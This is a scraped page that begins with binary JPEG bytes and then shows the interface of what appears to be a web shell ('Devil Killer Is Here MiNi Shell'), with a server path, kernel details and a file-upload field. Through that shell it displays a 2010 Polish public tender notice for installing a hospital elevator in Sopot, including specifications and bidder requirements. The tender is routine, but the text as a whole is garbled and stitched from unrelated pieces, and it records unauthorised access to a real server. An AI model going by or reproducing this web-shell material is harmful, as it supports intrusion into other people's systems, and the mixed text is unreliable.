JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100611/151483-N-2010.html

<p class="kh_header"><b>Sopot: Dostawa fabrycznie nowego dźwigu osobowego przystosowanego dla osób niepełnosprawnych oraz jego zainstalowanie w nowo rozbudowywanym szybie windowym w Pawilonie I - obiekcie Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko, zlokalizowanym przy ul. Grunwaldzkiej 5 w Sopocie.</b><br>
<b>Numer ogłoszenia: 151483 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zespół Reumatologiczny im. dr Jadwigi Titz-Kosko , ul. Grunwaldzka 1-3, 81-759 Sopot, woj. pomorskie, tel. 058 5557528.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzr.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego dźwigu osobowego przystosowanego dla osób niepełnosprawnych oraz jego zainstalowanie w nowo rozbudowywanym szybie windowym w Pawilonie I - obiekcie Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko, zlokalizowanym przy ul. Grunwaldzkiej 5 w Sopocie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania jest dostawa fabrycznie nowego dźwigu osobowego przystosowanego dla osób niepełnosprawnych oraz jego zainstalowanie w nowo rozbudowywanym szybie windowym w Pawilonie I - obiekcie Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko, zlokalizowanym przy ul. Grunwaldzkiej 5 w Sopocie. 
CPV: 42.41.61.00-6 - Windy
CPV: 45.31.31.00-5 - Instalowanie wind
2. Zakres prac obejmuje:
2.1. Zaprojektowanie i wykonanie dokumentacji projektowo-instalacyjnej.
2.2. Wykonanie dźwigu na podstawie danych zawartych w SIWZ oraz załączonym projekcie budowlanym opracowanym przez Biuro Architektoniczne MAT Sp. z o.o. z siedzibą w Gdańsku z listopada 2009 r. (Załącznik Nr 7 do SIWZ).
2.3. Dostawę dźwigu wraz z oprzyrządowaniem.
2.4. Instalację urządzeń dźwigowych w rozbudowanym szybie.
2.5. Podłączenie dźwigu do instalacji elektrycznej i teletechnicznej oraz rozruch dźwigu.
2.6. Przeprowadzenie prób i odbiorów niezbędnych do przekazania dźwigu do eksploatacji z udziałem wymaganych instytucji, w tym Urzędu Dozoru Technicznego i Zamawiającego.
2.7. Sporządzenie dokumentacji niezbędnej do rejestracji w Urzędzie Dozoru Technicznego i uzyskanie dopuszczenia windy do eksploatacji w Urzędzie Dozoru Technicznego.
2.8. Dostarczenie dokumentacji technicznej dźwigu (DTR) z instrukcją obsługi i eksploatacji dźwigu w języku polskim.
2.9. Przeszkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji dźwigu. 
UWAGA!!! Przed montażem dźwigu Wykonawca wraz z Zamawiającym dokona protokolarnie odbioru technicznego rozbudowanego szybu, jako prawidłowo wykonanego i nadającego się do montażu dźwigu będącego przedmiotem zamówienia.

W skład przedmiotu zamówienia wchodzi także transport windy do Pawilonu I, opakowanie i ubezpieczenie w czasie dostawy do siedziby Zamawiającego, które to świadczenie Wykonawca zobowiązany jest uwzględnić w ofercie. 

3. Opis budynku oraz stanu istniejącego. 
Pawilon I jest budynkiem o 3 kondygnacjach /parter, I piętro, II piętro + częściowo użytkowane poddasze/, o bryle prostej zamkniętej w formie prostopadłościanu i dachem dwuspadowym, rzucie korytarzowym dwutraktowym z dwoma skrajnymi klatkami schodowymi i dźwigiem osobowym na zamknięciu korytarza. Użytkowany jest jako oddział szpitalny. Obiekt podlega ochronie konserwatorskiej. 

Istniejący dźwig osobowy zlokalizowany jest na końcu korytarza przy południowej ścianie szczytowej w szybie o wymiarach: szer. 170 cm, gł. 125 cm i wys. 1090 cm. 

Nowy dźwig, będący przedmiotem niniejszego zamówienia, zamontowany zostanie w rozbudowanym szybie. Po przebudowie szyb będzie posiadał wymiary: szer. wewn. - 1950 mm, głęb. wewn. pozioma - 2850 mm, głęb. pionowa podszybia - 1400 mm, wys. nadszybia - 4000 mm, łączna wys. szybu bez podszybia - 13710 mm, powierzchnia wewn. szybu - 1,95 x 2,85 m = 5,55 m2.

4. Minimalne wymaganie techniczne przedmiotu zamówienia:
4.1. Wymagania ogólne	
Dźwig musi odpowiadać: 
1)	warunkom określonym w § 54 i § 193 - 202 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.), 
2)	- normie EN81 - 70
3)	- przepisom ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2000 r., Nr 122, poz. 1321 z późn. zm.).
4.2. Rodzaj dźwigu - dźwig szpitalny do przewozu:
pacjentów na noszach i łóżkach szpitalnych
pacjentów i osób niepełnosprawnych na wózkach
wózków szpitalnych z potrawami
wózków szpitalnych z materiałami medycznymi czystymi i zanieczyszczonymi
mebli i sprzętów szpitalnych.
Dźwig jest dźwigiem wymagającym zindywidualizowanego wykonania i montażu.
4.3. Kabina.
4.3.1. Rodzaj kabiny dźwigu - zamknięta, nieprzelotowa, drzwi w ścianie czołowej kabiny.
4.3.2. Wielkość kabiny 	- szerokość użytkowa (netto) pożądane 1300 mm czy pożądane 1400 mm
			- głębokość użytkowa 			2400 mm
			- wysokość użytkowa			2300 mm
4.3.3. Liczba przystanków - 3
- przystanek 0. - parter	 	?0,00
- przystanek 1. - piętro 1. 	+4,02
- przystanek 2. - piętro 2. 	+7,71
4.3.4. Wysokość podnoszenia 4020mm + 3690mm=7710mm
4.3.5. Udźwig nominalny 			- 1275 kg, 17 osób
4.3.6. Prędkość nominalna 			- 1,0 m/s
4.3.7. Prędkość przyspieszenia i hamowania 	- 1,2 m/s2
4.4. Drzwi przystankowe i kabinowe.	
4.4.1. Drzwi z ramą, automatyczne, teleskopowe, segmentowe, otwierane jednostronnie,
4.4.2. Oś otworu drzwiowego przesunięta w lewo (w widoku z kabiny) 1150 mm+800 mm=1950 mm.
4.4.3. Szerokość minimalna rozsuniętych drzwi - 1100 mm
4.4.4. Wysokość drzwi - 2100 mm,
4.4.5. Segmenty drzwiowe pełne (nieoszklone)
4.4.6. Drzwi z kurtyną świetlną i mechanicznym zabezpieczeniem przed zakleszczeniem
4.4.7. Drzwi bezklasowe pod względem p.poż.
4.5. Położenie zespołu napędowego 
- położony w nadszybiu
- umieszczony w konstrukcji stalowej z izolacją z podkładek gumowych redukujących wibracje i drgania.
4.6. Wentylacja grawitacyjna szybu.
Poniżej płyty stropowej nadszybia w części poddaszowej 2 otwory po 300 cm2, w bocznych, przeciwnych ścianach szybu, zabezpieczone żaluzjami ze stali kwasoodpornej.
4.7. Zasilanie główne dźwigu	
4.7.1. Prąd 3-fazowy 400V  + 3 x 230 V instalacji oświetleniowej szybu, doprowadzone kablami zasilającymi z rozdzielnicy głównej budynku.
4.7.2. Kabel zasilający urządzenia dźwigowe od góry do nadszybia prowadzony w korytarzami z rozdzielnicy do przyłącza na przystanku 2.
4.7.3. W instalacji elektrycznej pożądana funkcja wygaszania zbędnego czasowo zasilania (stand-by)
4.7.4. W instalacji funkcja sprowadzania kabiny na parter w sytuacji zagrożenia pożarowego i zaniku napięcia.
4.8. Piętrowskazywacz	- na przystanku 0 - ściana czołowa.
4.9. Kasety wezwań 
- przystanki 0, 1, 2  - ściana czołowa
4.10. Panel serwisowy 
- przystanek 2., ściana czołowa po stronie zespołu napędowego; oczekiwaniem Zamawiającego jest oszczędny serwis i konserwacja urządzeń dźwigowych sprowadzona do niezbędnego zakresu.
4.11. Oświetlenie 
4.11.1. Oświetlenie wnętrza szybu - natężenie min. 50lx
4.11.2. Oświetlenie podestów:
- przed drzwiami przystankowymi 0 i 1.- natężenie min 50 lx
- przed drzwiami przystankowymi 2. - natężenie min. 200 lx
4.12. Wyposażenie instalacyjne kabiny
4.12.1. Wentylacja kabiny - nie powodująca uczucia obniżenia temperatury w kabinie i nie wywołująca uczucia przeciągu;
4.12.2. Temperatura wnętrza - ze względu na przewóz pacjentów +20oC podtrzymywana przy niskiej temperaturze zewnętrznej za pomocą nagrzewnicy elektrycznej z termostatem w podszybiu 
4.12.3. Oświetlenie - jednakowe natężenie i rozproszenie światła zapobiegające powstaniu miejsc zacienionych, pożądane światło odbite, nie rażące leżących na łóżkach pacjentów.
4.12.4. Łączność - instalacja telefoniczna połączona ze stanowiskiem pielęgniarki dyżurnej na 1. piętrze tego samego budynku i portiernią główną WZR (bez robót terenowych)
4.12.5. Wyposażenie bezpieczeństwa 	
- zabezpieczenie przed zakleszczeniem
- kurtyna świetlna w drzwiach
- sygnał dźwiękowy otwarcia drzwi kabiny.
4.13. Wyposażenie kabiny
4.13.1. Pionowy panel dyspozycji ze wszystkimi przyciskami, sygnalizatorami  i mikrofonem łączności telefonicznej.
4.13.2.  Wskaźnik kierunku jazdy jeżdżący z kabiną,
4.13.3. Lustro na ścianie tylnej z dolną krawędzią na wysokości 120 cm npp,
4.13.4. Poręcze na wysokości 90 ÷ 110 cm npp na ścianie tylnej
4.14. Dodatkowe wymagania dotyczące kabiny
4.14.1.	Warunki utrzymania kabiny - wysoka odporność elementów wnętrza i drzwi na uderzenia łóżkami, wózkami i meblami, posadzka przeciwpoślizgowa.
4.14.2.	Warunki utrzymania higieny wewnątrz kabiny - materiały ścian i posadzki nienasiąkliwe, łatwo zmywalne i odporne na działanie środków czystości, wewnętrzna zabudowa kabiny bez trudnych w czyszczeniu i zmywaniu styków i spojeń.
4.14.3.	Warunki wnętrzarskie kabiny
- wystrój i bez przesadnych rozwiązań i efektów wnętrzarskich, nacisk położony na funkcjonalność i ergonomiczność rozwiązań,
- szczególnie panel dyspozycji z dobrze rozpoznawalnymi, wypukłymi i podświetlonymi przyciskami, dobrze widocznymi z różnych poziomów i kątów, dostępnymi z rożnych poziomów (osoba siedząca i stojąca),
- ogólna tonacja kabiny - jasna kolorystyka - do wyboru przez Zamawiającego,
- wszelkie elementy wnętrza kabiny wykonane ze stali nierdzewnej.
4.15.	Komfort jazdy
4.15.1. Pożądana jazda kabiny płynna, bez kołysań i nadmiernych zmian prędkości, z dokładnością zatrzymań kabiny +/- 3 mm; zalecane zastosowanie pasów stalowo - poliuretanowych
4.16.	Zabezpieczenia akustyczne
szyb dźwigu nie jest oddylatowany od istniejącej konstrukcji budynku, w związku z tym pożądane jest zastosowanie w urządzeniach dźwigowych skutecznych, fabrycznych zabezpieczeń akustycznych i wibracyjnych (podkładki gumowe).

5. Przedmiot zamówienia w ujęciu całościowym określa projekt budowlany z listopada 2009 r. sporządzony przez Biuro Architektoniczne MAT Sp. z o.o. z siedzibą w Gdańsku, stanowiący Załącznik Nr 7 do SIWZ.

6. Wymagana gwarancja. Zamawiający wymaga udzielenia minimum 24-miesięcznej gwarancji i w ramach serwisu gwarancyjnego również dokonywania przeglądów i konserwacji dźwigu oraz obsługi systemu komunikacji głosowej, licząc od daty zainstalowania dźwigu potwierdzonej protokołem uruchomienia i odbioru dźwigu do eksploatacji, a także minimalnego czasu reakcji na serwisu na zgłoszenie usterki - do 24 godzin od telefonicznego lub faksowego zgłoszenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.31.31.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wniesienie wadium - jest wymagane.
Wysokość wadium dla całości zamówienia wynosi 4.440,00 zł (słownie: cztery tysiące czterysta czterdzieści PLN, 00/100).
Zabezpieczenie należytego wykonania umowy - jest wymagane.
- Kwota zabezpieczenia należytego wykonania umowy stanowi 5 % ceny oferty brutto, tj. z podatkiem VAT, wynik należy zaokrąglić w górę do pełnych setek.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę dokumentu wskazanego w rozdziale VI pkt. 1 ppkt 1 SIWZ. W razie złożenia oświadczenia o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, stanowiących przedmiot niniejszego postępowania o udzielenie zamówienia publicznego na dostawę i montaż dźwigu osobowego w postaci uprawnienia do wytwarzania i montażu dźwigów osobowych wydanego przez Urząd Dozoru Technicznego, Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w rozdziale VI pkt. 1 ppkt. 2 i 3 SIWZ. W razie złożenia przez Wykonawcę oświadczenia o spełnianiu warunku oraz wykazu wykonanych, a w przypadku świadczeń okresowych i ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwóch dostaw dźwigu wraz z jego montażem o wartości jednostkowej minimum 200.000 zł brutto każda, według wzoru stanowiącego Załącznik Nr 4 do SIWZ, oraz załączenia dokumentów potwierdzających, że dostawy zostały wykonane lub są wykonywane należycie, Zamawiający uzna warunek za spełniony.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku nastąpi w oparciu o pisemny dokument wystawiony przez podmiot oddający Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w rozdziale VI pkt. 1 ppkt. 4 i 5 SIWZ. W razie złożenia przez Wykonawcę oświadczenia o spełnianiu warunku oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, oraz z informacją o podstawie do dysponowania tymi osobami potwierdzającymi dysponowanie osobami posiadającymi wyższe wykształcenie techniczne i co najmniej dwuletnią praktykę zawodową lub wykształcenie średnie techniczne i co najmniej pięcioletnią praktykę zawodową oraz które posiadają znajomość norm, przepisów o dozorze technicznym i warunków technicznych dozoru technicznego w zakresie prowadzonej działalności, zgodnie z art. 22 ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2000 r., Nr 122, poz. 1321 z późn. zm. - według wzoru stanowiącego Załącznik nr 5 do SIWZ, Zamawiający uzna warunek za spełniony.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku nastąpi w oparciu o pisemny dokument wystawiony przez podmiot oddający Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w punkcie III.3.3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w rozdziale VI pkt. 1 ppkt. 6 i 7 SIWZ.
W razie złożenia przez Wykonawcę oświadczenia o spełnianiu warunku oraz opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie ubezpieczenia minimum 200.000,00 zł, Zamawiający uzna warunek za spełniony.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku nastąpi w oparciu o pisemny dokument wystawiony przez podmiot oddający Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>DOWÓD WNIESIENIA WADIUM</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
